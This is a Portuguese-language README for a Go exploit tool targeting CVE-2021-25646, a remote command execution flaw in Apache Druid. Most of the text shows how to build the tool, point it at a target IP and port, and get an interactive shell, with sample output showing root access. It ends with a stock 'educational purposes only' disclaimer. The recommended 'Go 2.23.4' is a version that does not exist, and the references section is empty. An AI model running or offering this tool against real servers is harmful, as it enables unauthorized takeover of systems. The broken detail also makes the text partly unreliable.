
Uma prova de conceito para o CVE-2021-25646, que permite injeção de comandos
Este repositório contém uma prova-de-conceito (PoC) para a CVE-2021-25646, uma vulnerabilidade crítica de execução remota de código no Apache Druid.
O exploit é escrito em Go e permite injeção interativa de comandos via terminal.
Você precisa ter o Go instalado (versão 2.23.4 recomendada).
go build .
Isso produzirá um binário no diretório atual.
Você pode executar o exploit compilando o binário ou diretamente com go run.
-i : Endereço IP do servidor Druid alvo (obrigatório)-p : Porta do servidor Druid alvo (obrigatório)-proxy : Especificar a URL do proxy (opcional)Executar o binário compilado:
./cve -i 127.0.0.1 -p 8888
Ou executar diretamente com Go:
go run main.go -i 127.0.0.1 -p 8888
$ ./cve -i 127.0.0.1 -p 8888
~ $ whoami
root
~ $ uname -a
Linux druid-server 4.15.0-123-generic #126-Ubuntu SMP ...
Vulnerabilidade:
O exploit abusa da validação inadequada de entrada no componente indexer do Druid, especificamente na API task, permitindo injeção de comandos através de payloads JSON manipulados.
Referências:
Este software é fornecido apenas para fins educacionais.
O autor não é responsável por qualquer uso indevido ou danos causados por este código.
Sempre obtenha autorização adequada antes de testar qualquer sistema.